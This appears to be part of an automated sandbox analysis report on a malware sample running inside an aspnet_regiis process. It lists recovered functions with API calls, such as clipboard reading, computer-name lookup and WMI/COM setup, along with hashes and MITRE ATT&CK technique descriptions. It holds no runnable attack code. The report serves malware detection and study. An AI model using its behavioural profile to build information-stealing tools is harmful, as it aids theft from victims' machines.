Source File: 00000003.00000002.3389532539.0000000003171000.00000020.00000400.00020000.00000000.sdmp, Offset: 03170000, based on PE: true

Associated: 00000003.00000002.3389516195.0000000003170000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.3389570184.00000000031B2000.00000002.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.3389587692.00000000031B5000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.3389606780.00000000031C3000.00000002.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_3170000_aspnet_regiis.jbxd

Similarity

API ID: DefaultLanguageUser
String ID:
API String ID: 95929093-3916222277
Opcode ID: 695f5439a89faac36057e2bacc82dfbc7ec0a36e46461c10cadfd9904b218a85
Instruction ID: d41ca2704c04e32551db3ec24eae359c8e14436b84626c7fd804b99c2518c47a
Opcode Fuzzy Hash: 695f5439a89faac36057e2bacc82dfbc7ec0a36e46461c10cadfd9904b218a85
Instruction Fuzzy Hash: 4E215EB5E052548FCB19DB6CC8566DDBBF1AF5A304F0940ADD88DDB380C6745A84CF52

Function 0317CBF6 Relevance: 3.1, APIs: 2, Instructions: 120COMMON

Download Yara Rule

APIs

CoInitializeEx.OLE32(00000000,00000002), ref: 0317CBFA
CoInitializeEx.COMBASE(00000000,00000002), ref: 0317CD45

Memory Dump Source

Source File: 00000003.00000002.3389532539.0000000003171000.00000020.00000400.00020000.00000000.sdmp, Offset: 03170000, based on PE: true

Associated: 00000003.00000002.3389516195.0000000003170000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.3389570184.00000000031B2000.00000002.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.3389587692.00000000031B5000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.3389606780.00000000031C3000.00000002.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_3170000_aspnet_regiis.jbxd

Similarity

API ID: Initialize
String ID:
API String ID: 2538663250-0
Opcode ID: f335da738b9d8bd4da365ee1d88ce8d4c2768ea95cdc9ef5096e6f6348b89820
Instruction ID: 16dcbbe7d52429b8c9702640264427fd75977275bf309a38e62c25083112d920
Opcode Fuzzy Hash: f335da738b9d8bd4da365ee1d88ce8d4c2768ea95cdc9ef5096e6f6348b89820
Instruction Fuzzy Hash: 0041D7B4910B00AFD370AF398A0B7127EF4AB05250F504B1DF9EA866D4E631A4198BD3

Function 0319C918 Relevance: 1.6, APIs: 1, Instructions: 81COMMON

Download Yara Rule

APIs

GetComputerNameExA.KERNELBASE(00000005,?,00000100), ref: 0319C9F5

Memory Dump Source

Source File: 00000003.00000002.3389532539.0000000003171000.00000020.00000400.00020000.00000000.sdmp, Offset: 03170000, based on PE: true

Associated: 00000003.00000002.3389516195.0000000003170000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.3389570184.00000000031B2000.00000002.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.3389587692.00000000031B5000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.3389606780.00000000031C3000.00000002.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_3170000_aspnet_regiis.jbxd

Similarity

API ID: ComputerName
String ID:
API String ID: 3545744682-0
Opcode ID: 8488db808b8c3ba923823843e05ca30b380b869dd21e0d151cd624853b32fbae
Instruction ID: 09ca67f2ce3378925fd1d7dddb031a6e1e7964a60672fbfda4534b97bbe1135c
Opcode Fuzzy Hash: 8488db808b8c3ba923823843e05ca30b380b869dd21e0d151cd624853b32fbae
Instruction Fuzzy Hash: 9B2108762483814BDB24CF79C5947ABB7DAAFD9740F09456EC4C9C7241DB748805C762

Function 03183942 Relevance: 1.6, APIs: 1, Instructions: 60threadCOMMON

Download Yara Rule

APIs

CreateThread.KERNELBASE ref: 0318399F

Memory Dump Source

Source File: 00000003.00000002.3389532539.0000000003171000.00000020.00000400.00020000.00000000.sdmp, Offset: 03170000, based on PE: true

Associated: 00000003.00000002.3389516195.0000000003170000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.3389570184.00000000031B2000.00000002.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.3389587692.00000000031B5000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.3389606780.00000000031C3000.00000002.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_3170000_aspnet_regiis.jbxd

Similarity

API ID: CreateThread
String ID:
API String ID: 2422867632-0
Opcode ID: 6a4c6116a5b957650b7e532744ca2ae1f0945fca077dd42bdcf5fb98b1691495
Instruction ID: de01842daf2af5f1853ca0172886550878441d31bcc98fc037c7c7d6d1a8abba
Opcode Fuzzy Hash: 6a4c6116a5b957650b7e532744ca2ae1f0945fca077dd42bdcf5fb98b1691495
Instruction Fuzzy Hash: 6C21D2BAA0D3804BE358DB38C49439BBBD2ABD8314F1CC96DD0D887285DBB544068B53

Function 03183798 Relevance: 1.6, APIs: 1, Instructions: 60threadCOMMON

Download Yara Rule

APIs

CreateThread.KERNELBASE ref: 0318399F

Memory Dump Source

Source File: 00000003.00000002.3389532539.0000000003171000.00000020.00000400.00020000.00000000.sdmp, Offset: 03170000, based on PE: true

Associated: 00000003.00000002.3389516195.0000000003170000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.3389570184.00000000031B2000.00000002.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.3389587692.00000000031B5000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.3389606780.00000000031C3000.00000002.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_3170000_aspnet_regiis.jbxd

Similarity

API ID: CreateThread
String ID:
API String ID: 2422867632-0
Opcode ID: 37aefcd441b1901093ad89667932b8004e0dca898b3e280927998cd1892be203
Instruction ID: ac8007a0ab11515864a4968a8232bf94a0a85fa9d8f3121474c8912c73ff2433
Opcode Fuzzy Hash: 37aefcd441b1901093ad89667932b8004e0dca898b3e280927998cd1892be203
Instruction Fuzzy Hash: EA21E1BAA0D3808BD358DB28C49439BBBD2ABD8710F1DCC6DD4D887380DBB584468B53

Function 031AD7A0 Relevance: 1.5, APIs: 1, Instructions: 45memoryCOMMON

Download Yara Rule

APIs

RtlReAllocateHeap.NTDLL(?,00000000,?,?,?,00000000,0317B691,00000000,00000001), ref: 031AD7D2

Memory Dump Source

Source File: 00000003.00000002.3389532539.0000000003171000.00000020.00000400.00020000.00000000.sdmp, Offset: 03170000, based on PE: true

Associated: 00000003.00000002.3389516195.0000000003170000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.3389570184.00000000031B2000.00000002.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.3389587692.00000000031B5000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.3389606780.00000000031C3000.00000002.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_3170000_aspnet_regiis.jbxd

Similarity

API ID: AllocateHeap
String ID:
API String ID: 1279760036-0
Opcode ID: 8a347fedb7e0cdedca53d235f912c44368465c668af6173c767ac75333106659
Instruction ID: fed9ade2623f75cebf073b24ea7d383dd5dffd3da140f22c5be61873c052fd23
Opcode Fuzzy Hash: 8a347fedb7e0cdedca53d235f912c44368465c668af6173c767ac75333106659
Instruction Fuzzy Hash: 4BF0E53A558B90EBC619EF2CBC04E973678EF8E622F024831E504DB114F730D882C6B1

Function 031A27A3 Relevance: 1.5, APIs: 1, Instructions: 27COMMON

Download Yara Rule

APIs

CoSetProxyBlanket.COMBASE ref: 031A27E8

Memory Dump Source

Source File: 00000003.00000002.3389532539.0000000003171000.00000020.00000400.00020000.00000000.sdmp, Offset: 03170000, based on PE: true

Associated: 00000003.00000002.3389516195.0000000003170000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.3389570184.00000000031B2000.00000002.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.3389587692.00000000031B5000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.3389606780.00000000031C3000.00000002.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_3170000_aspnet_regiis.jbxd

Similarity

API ID: BlanketProxy
String ID:
API String ID: 3890896728-0
Opcode ID: d0b1436feac7a5b2d3c1f80ea31f399da8f8fed136407d11aad9b3f75a660725
Instruction ID: 8c1e1c6e59bb8cf5fe9056834d6073f93b785eff1ad33dca377478e1fc897df1
Opcode Fuzzy Hash: d0b1436feac7a5b2d3c1f80ea31f399da8f8fed136407d11aad9b3f75a660725
Instruction Fuzzy Hash: 94F01DB46083418FE354DF55C4A475ABBE5FB88304F01881DE495CB344DBB5A659CF81

Function 0319EBBE Relevance: 1.5, APIs: 1, Instructions: 21COMMON

Download Yara Rule

APIs

CoSetProxyBlanket.COMBASE ref: 0319EC01

Memory Dump Source

Source File: 00000003.00000002.3389532539.0000000003171000.00000020.00000400.00020000.00000000.sdmp, Offset: 03170000, based on PE: true

Associated: 00000003.00000002.3389516195.0000000003170000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.3389570184.00000000031B2000.00000002.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.3389587692.00000000031B5000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.3389606780.00000000031C3000.00000002.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_3170000_aspnet_regiis.jbxd

Similarity

API ID: BlanketProxy
String ID:
API String ID: 3890896728-0
Opcode ID: 3f9c44dd3eeb412dc258202961f44561890e677b759986915467a9e43a83ba0d
Instruction ID: 7615ced773680e571548fe71a3f77e2f923f72687680c3fc1e2316c1c1df6a8f
Opcode Fuzzy Hash: 3f9c44dd3eeb412dc258202961f44561890e677b759986915467a9e43a83ba0d
Instruction Fuzzy Hash: C3F098B4508301DFE354DF24D1A871ABBE4AB88704F00490CE5E98B391D7B6A548CF82

Function 031ABD90 Relevance: 1.5, APIs: 1, Instructions: 18memoryCOMMON

Download Yara Rule

APIs

RtlFreeHeap.NTDLL(?,00000000,?,031AD7EB,?,0317B691,00000000,00000001), ref: 031ABDC1

Memory Dump Source

Source File: 00000003.00000002.3389532539.0000000003171000.00000020.00000400.00020000.00000000.sdmp, Offset: 03170000, based on PE: true

Associated: 00000003.00000002.3389516195.0000000003170000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.3389570184.00000000031B2000.00000002.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.3389587692.00000000031B5000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.3389606780.00000000031C3000.00000002.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_3170000_aspnet_regiis.jbxd

Similarity

API ID: FreeHeap
String ID:
API String ID: 3298025750-0
Opcode ID: 62af61d1117cfeaf32fc06e83e78a53f2bdc46ce82c2620f27e877174bd72732
Instruction ID: a30737538d52dc4ebacae588101177a0815a5679aa443845b2e9afbb71a318a0
Opcode Fuzzy Hash: 62af61d1117cfeaf32fc06e83e78a53f2bdc46ce82c2620f27e877174bd72732
Instruction Fuzzy Hash: 0ED01735418621EBCB243F28B8106863A65EF0D222F0608A1E2405A0A8D7319C93CAB0

Function 0317CD97 Relevance: 1.5, APIs: 1, Instructions: 17COMMON

Download Yara Rule

APIs

CoInitializeSecurity.COMBASE(00000000,000000FF,00000000,00000000,00000000,00000003,00000000,00000000,00000000), ref: 0317CDA9

Memory Dump Source

Source File: 00000003.00000002.3389532539.0000000003171000.00000020.00000400.00020000.00000000.sdmp, Offset: 03170000, based on PE: true

Associated: 00000003.00000002.3389516195.0000000003170000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.3389570184.00000000031B2000.00000002.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.3389587692.00000000031B5000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.3389606780.00000000031C3000.00000002.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_3170000_aspnet_regiis.jbxd

Similarity

API ID: InitializeSecurity
String ID:
API String ID: 640775948-0
Opcode ID: 31a2462f919ca5efb4a04bcd261dd30a4b4281d7bff9afd10071cb80770b2626
Instruction ID: 6a684ceaa0215872f329f303e5c7d20e293746561bbaa0be1cc0030ecc43168b
Opcode Fuzzy Hash: 31a2462f919ca5efb4a04bcd261dd30a4b4281d7bff9afd10071cb80770b2626
Instruction Fuzzy Hash: 99D0C9343D43417BF5786608AC53F103B12670AF59F700604B362FE2C4DAE07150862C

Function 031AD991 Relevance: 1.5, APIs: 1, Instructions: 15COMMON

Download Yara Rule

APIs

GetForegroundWindow.USER32 ref: 031AD99F

Memory Dump Source

Source File: 00000003.00000002.3389532539.0000000003171000.00000020.00000400.00020000.00000000.sdmp, Offset: 03170000, based on PE: true

Associated: 00000003.00000002.3389516195.0000000003170000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.3389570184.00000000031B2000.00000002.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.3389587692.00000000031B5000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.3389606780.00000000031C3000.00000002.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_3170000_aspnet_regiis.jbxd

Similarity

API ID: ForegroundWindow
String ID:
API String ID: 2020703349-0
Opcode ID: 0fcbc647b079328d13e949bf17e7956f3519ad57efe550eb8bca306de5246f4a
Instruction ID: e7e042751b942ec419e55a223cfd15faeef38edd23110daf546c00083c3fdfc2
Opcode Fuzzy Hash: 0fcbc647b079328d13e949bf17e7956f3519ad57efe550eb8bca306de5246f4a
Instruction Fuzzy Hash: 16D017B8A003409BC618FF28E88642037A4BB1E2053041829E613C7359EA36D992CE32

Function 031ABD70 Relevance: 1.5, APIs: 1, Instructions: 9memoryCOMMON

Download Yara Rule

APIs

RtlAllocateHeap.NTDLL(?,00000000,C9C83C46,1875303D,0317882D,C9C83C46), ref: 031ABD80

Memory Dump Source

Source File: 00000003.00000002.3389532539.0000000003171000.00000020.00000400.00020000.00000000.sdmp, Offset: 03170000, based on PE: true

Associated: 00000003.00000002.3389516195.0000000003170000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.3389570184.00000000031B2000.00000002.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.3389587692.00000000031B5000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.3389606780.00000000031C3000.00000002.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_3170000_aspnet_regiis.jbxd

Similarity

API ID: AllocateHeap
String ID:
API String ID: 1279760036-0
Opcode ID: 1b929ef219011b6e0c22aee38d70fc8dae0fe59737825bbc855e65bc107de7e1
Instruction ID: 5aba21e0dc1f80f80ff3f2724616d3ca180a6403d393e7a4819bf05abf252fc6
Opcode Fuzzy Hash: 1b929ef219011b6e0c22aee38d70fc8dae0fe59737825bbc855e65bc107de7e1
Instruction Fuzzy Hash: 2EC04839155220ABCA246A18EC08BCA3E69AF4D662F020891B4046A0B48760AC92CAA4

Non-executed Functions

Function 031A2FF0 Relevance: 12.4, APIs: 6, Strings: 1, Instructions: 136clipboardCOMMON

Download Yara Rule

APIs

OpenClipboard.USER32 ref: 031A3004
GetClipboardData.USER32 ref: 031A301F
GlobalLock.KERNEL32 ref: 031A3038
GetWindowLongW.USER32 ref: 031A309D
GlobalUnlock.KERNEL32 ref: 031A31AB
CloseClipboard.USER32 ref: 031A31B6

Strings

g, xrefs: 031A30EF

Memory Dump Source

Source File: 00000003.00000002.3389532539.0000000003171000.00000020.00000400.00020000.00000000.sdmp, Offset: 03170000, based on PE: true

Associated: 00000003.00000002.3389516195.0000000003170000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.3389570184.00000000031B2000.00000002.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.3389587692.00000000031B5000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.3389606780.00000000031C3000.00000002.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_3170000_aspnet_regiis.jbxd

Similarity

API ID: Clipboard$Global$CloseDataLockLongOpenUnlockWindow
String ID: g
API String ID: 2832541153-30677878
Opcode ID: 82dd7fa52c6e99875f8768552a58f0fc019e1fbd15f1c4ec84889670e730b2bc
Instruction ID: 8b8a3990ea58812ae7e7e727166491930b429e2f9656d5b198cd35be294a1e48
Opcode Fuzzy Hash: 82dd7fa52c6e99875f8768552a58f0fc019e1fbd15f1c4ec84889670e730b2bc
Instruction Fuzzy Hash: A251AF7550C7818FD314EFBC898935EBEE19B8A220F094E2DE4E5872D1E7748589C7A3

Function 03193A90 Relevance: 9.1, APIs: 2, Strings: 3, Instructions: 327COMMON

Download Yara Rule

APIs

RtlExpandEnvironmentStrings.NTDLL(00000000,?,0000001E,00000000,00000000,8E48886E), ref: 03193BB7
RtlExpandEnvironmentStrings.NTDLL(00000000,?,0000001E,00000000,8E48886E,8E48886E), ref: 03193C44

Strings

y{, xrefs: 03193C66
uw, xrefs: 03193C7B
GD, xrefs: 03193B1D

Memory Dump Source

Source File: 00000003.00000002.3389532539.0000000003171000.00000020.00000400.00020000.00000000.sdmp, Offset: 03170000, based on PE: true

Associated: 00000003.00000002.3389516195.0000000003170000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.3389570184.00000000031B2000.00000002.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.3389587692.00000000031B5000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.3389606780.00000000031C3000.00000002.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_3170000_aspnet_regiis.jbxd

Similarity

API ID: EnvironmentExpandStrings
String ID: GD$uw$y{
API String ID: 237503144-3441165588
Opcode ID: 0289cbbf1345c76fa717d2a62721711f465a1c4e8f3d58e2cc3708bf3de0241e
Instruction ID: 70bacc67ee3771615f593ce5c356753e20622adabc903386068ea34d49e915fc
Opcode Fuzzy Hash: 0289cbbf1345c76fa717d2a62721711f465a1c4e8f3d58e2cc3708bf3de0241e
Instruction Fuzzy Hash: 00A145B5A043049FEB14CF69DC827AEBBB5FF88304F14852DE525AB385E7349506CBA1

Function 03193D50 Relevance: 7.3, APIs: 1, Strings: 3, Instructions: 305COMMON

Download Yara Rule

Strings

y{, xrefs: 03193C66
uw, xrefs: 03193C7B
i-i/, xrefs: 03193D69

Memory Dump Source

Source File: 00000003.00000002.3389532539.0000000003171000.00000020.00000400.00020000.00000000.sdmp, Offset: 03170000, based on PE: true

Associated: 00000003.00000002.3389516195.0000000003170000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.3389570184.00000000031B2000.00000002.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.3389587692.00000000031B5000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.3389606780.00000000031C3000.00000002.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_3170000_aspnet_regiis.jbxd

Similarity

API ID:
String ID: i-i/$uw$y{
API String ID: 0-2067557706
Opcode ID: 862ce6f25811d5cdadc07096990a123aeb2806eedf0dcf76cd0dd7cb2fb17733
Instruction ID: c8791ab0ac314dad1a150b04f6712d44c181acfddc2c6ae7bd7e0047d9444986
Opcode Fuzzy Hash: 862ce6f25811d5cdadc07096990a123aeb2806eedf0dcf76cd0dd7cb2fb17733
Instruction Fuzzy Hash: CA915372A183009FD7288F68DC427ABB7E5EB89314F044A3EE569CB3C1E77498058B91

Function 0319FF7F Relevance: 17.6, APIs: 1, Strings: 9, Instructions: 126COMMON

Download Yara Rule

APIs

VariantInit.OLEAUT32 ref: 0319FFB8

Strings

3, xrefs: 0319FFE6
E, xrefs: 0319FFE2
C, xrefs: 0319FFFA
%, xrefs: 0319FFDE
=, xrefs: 0319FFEE
B, xrefs: 0319FFF6
K, xrefs: 0319FFDA
A, xrefs: 0319FFF2
G, xrefs: 0319FFEA

Memory Dump Source

Source File: 00000003.00000002.3389532539.0000000003171000.00000020.00000400.00020000.00000000.sdmp, Offset: 03170000, based on PE: true

Associated: 00000003.00000002.3389516195.0000000003170000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.3389570184.00000000031B2000.00000002.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.3389587692.00000000031B5000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.3389606780.00000000031C3000.00000002.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_3170000_aspnet_regiis.jbxd

Similarity

API ID: InitVariant
String ID: %$3$=$A$B$C$E$G$K
API String ID: 1927566239-1830440523
Opcode ID: f4ca07e78f27c91b63a86bddd253640ab1ed238c25bd5397b9b27e0822fa2af8
Instruction ID: bb948571d4fc691bebceb5b1367ae610e8775be87eb2e7a7f6609a32ea6a0e21
Opcode Fuzzy Hash: f4ca07e78f27c91b63a86bddd253640ab1ed238c25bd5397b9b27e0822fa2af8
Instruction Fuzzy Hash: 9F51C1B5208B808FD715DF3CC895756BFE1AF5A304F08899DC49ACB386D678E909CB15

Function 0319F6DC Relevance: 17.6, APIs: 1, Strings: 9, Instructions: 95COMMON

Download Yara Rule

APIs

VariantInit.OLEAUT32 ref: 0319F712

Strings

G, xrefs: 0319F73E
C, xrefs: 0319F74E
K, xrefs: 0319F72E
A, xrefs: 0319F746
E, xrefs: 0319F736
%, xrefs: 0319F732
3, xrefs: 0319F73A
=, xrefs: 0319F742
B, xrefs: 0319F74A

Memory Dump Source

Source File: 00000003.00000002.3389532539.0000000003171000.00000020.00000400.00020000.00000000.sdmp, Offset: 03170000, based on PE: true

Associated: 00000003.00000002.3389516195.0000000003170000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.3389570184.00000000031B2000.00000002.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.3389587692.00000000031B5000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.3389606780.00000000031C3000.00000002.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_3170000_aspnet_regiis.jbxd

Similarity

API ID: InitVariant
String ID: %$3$=$A$B$C$E$G$K
API String ID: 1927566239-1830440523
Opcode ID: c6cd73690a6489dad37fa436ed54047155cc09fbde3606e90f9ae139bc2bb543
Instruction ID: bba35c501226fc313ae32c30011ac43f71edc3fe28a00dd5a9e3bbe4b7321820
Opcode Fuzzy Hash: c6cd73690a6489dad37fa436ed54047155cc09fbde3606e90f9ae139bc2bb543
Instruction Fuzzy Hash: 884179B1208B808FD715DF38C899756BBE1BB99304F08899DD4DA8B386D7B4A504CB26

Function 0319E196 Relevance: 8.9, APIs: 1, Strings: 4, Instructions: 146libraryCOMMON

Download Yara Rule

APIs

LoadLibraryExW.KERNEL32(4FD74DDC,00000000,00000800), ref: 0319E369

Strings

5U2W, xrefs: 0319E2AE
k\h1, xrefs: 0319E1A1
|}, xrefs: 0319E2F0
y{, xrefs: 0319E2E5

Memory Dump Source

Source File: 00000003.00000002.3389532539.0000000003171000.00000020.00000400.00020000.00000000.sdmp, Offset: 03170000, based on PE: true

Associated: 00000003.00000002.3389516195.0000000003170000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.3389570184.00000000031B2000.00000002.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.3389587692.00000000031B5000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.3389606780.00000000031C3000.00000002.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_3170000_aspnet_regiis.jbxd

Similarity

API ID: LibraryLoad
String ID: 5U2W$k\h1$|}$y{
API String ID: 1029625771-1906802574
Opcode ID: 08880b370dd418913225ae65225e0b1e44c9cf8a4a3b4c20955e8b6c4ff6b10d
Instruction ID: 47e48812a2ad9a21ed7bf6abf0aa738d99c40dc6fdcf36790b771dbbcb372a99
Opcode Fuzzy Hash: 08880b370dd418913225ae65225e0b1e44c9cf8a4a3b4c20955e8b6c4ff6b10d
Instruction Fuzzy Hash: D7412A7395C7908BD338CE25C841396FBE6ABD8300F1EC96DC4CD9B645CB7848018B82

Function 03193F50 Relevance: 5.5, APIs: 1, Strings: 2, Instructions: 209COMMON

Download Yara Rule

Strings

y{, xrefs: 03193C66
uw, xrefs: 03193C7B

Memory Dump Source

Source File: 00000003.00000002.3389532539.0000000003171000.00000020.00000400.00020000.00000000.sdmp, Offset: 03170000, based on PE: true

Associated: 00000003.00000002.3389516195.0000000003170000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.3389570184.00000000031B2000.00000002.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.3389587692.00000000031B5000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.3389606780.00000000031C3000.00000002.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_3170000_aspnet_regiis.jbxd

Similarity

API ID:
String ID: uw$y{
API String ID: 0-756344669
Opcode ID: 1462e960e6b9a57140a96572143ecc5dc2f502e4d7df07c226d345387dd292b3
Instruction ID: aa74b38439b2ac51840b56c220cbe3932a24d4acf132239ed21acb3ffcac4711
Opcode Fuzzy Hash: 1462e960e6b9a57140a96572143ecc5dc2f502e4d7df07c226d345387dd292b3
Instruction Fuzzy Hash: 5E511375604300EFEB149F28EC41BAAB7F4FB89314F14492AF5659B2C1E774D446CBA1

Function 031A38C3 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 88COMMON

Download Yara Rule

APIs

GetSystemMetrics.USER32 ref: 031A38FF
GetSystemMetrics.USER32 ref: 031A390E

Strings

, xrefs: 031A39BC

Memory Dump Source

Source File: 00000003.00000002.3389532539.0000000003171000.00000020.00000400.00020000.00000000.sdmp, Offset: 03170000, based on PE: true

Associated: 00000003.00000002.3389516195.0000000003170000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.3389570184.00000000031B2000.00000002.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.3389587692.00000000031B5000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.3389606780.00000000031C3000.00000002.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_3170000_aspnet_regiis.jbxd

Similarity

API ID: MetricsSystem
String ID:
API String ID: 4116985748-3916222277
Opcode ID: 30ed8bcddfa57fa5ce5396a03b9ea189f1d3b90f7b13df068d16561b4bf2ec51
Instruction ID: 44777feca9a0430226c75fa5c86694c60f24fc80ea92493c91d589dfa1d67ec2
Opcode Fuzzy Hash: 30ed8bcddfa57fa5ce5396a03b9ea189f1d3b90f7b13df068d16561b4bf2ec51
Instruction Fuzzy Hash: C931B2B49183549FDB00EF78D98460EBBF4BB88304F41492EE498DB355D370A998CB92

Description:	Adversaries may abuse Windows Management Instrumentation (WMI) to execute malicious commands and payloads. WMI is an administration feature that provides a uniform environment to access Windows system components. The WMI service enables both local and remote access, though the latter is facilitated by Remote Services such as Distributed Component Object Model (DCOM) and Windows Remote Management (WinRM).Remote WMI over DCOM operates using port 135, whereas WMI over WinRM operates over port 5985 when using HTTP and 5986 for HTTPS.
Tactics:	Execution
Data Sources:	Command: Command Execution, Network Traffic: Network Connection Creation, Process: Process Creation, WMI: WMI Creation
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may abuse command and script interpreters to execute commands, scripts, or binaries. These interfaces and languages provide ways of interacting with computer systems and are a common feature across many different platforms. Most systems come with some built-in command-line interface and scripting capabilities, for example, macOS and Linux distributions include some flavor of Unix Shell while Windows installations include the Windows Command Shell and PowerShell .
Tactics:	Execution
Data Sources:	Command: Command Execution, Module: Module Load, Process: Process Creation, Process: Process Metadata, Script: Script Execution
Platforms:	Azure AD, Google Workspace, IaaS, Linux, macOS, Network, Office 365, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may abuse PowerShell commands and scripts for execution. PowerShell is a powerful interactive command-line interface and scripting environment included in the Windows operating system.Adversaries can use PowerShell to perform a number of actions, including discovery of information and execution of code. Examples include the `Start-Process` cmdlet which can be used to run an executable and the `Invoke-Command` cmdlet which runs a command locally or on a remote computer (though administrator permissions are required to use PowerShell to connect to remote systems).
Tactics:	Execution
Data Sources:	Command: Command Execution, Module: Module Load, Process: Process Creation, Process: Process Metadata, Script: Script Execution
Platforms:	Windows
Url:	Open detailed description by Mitre

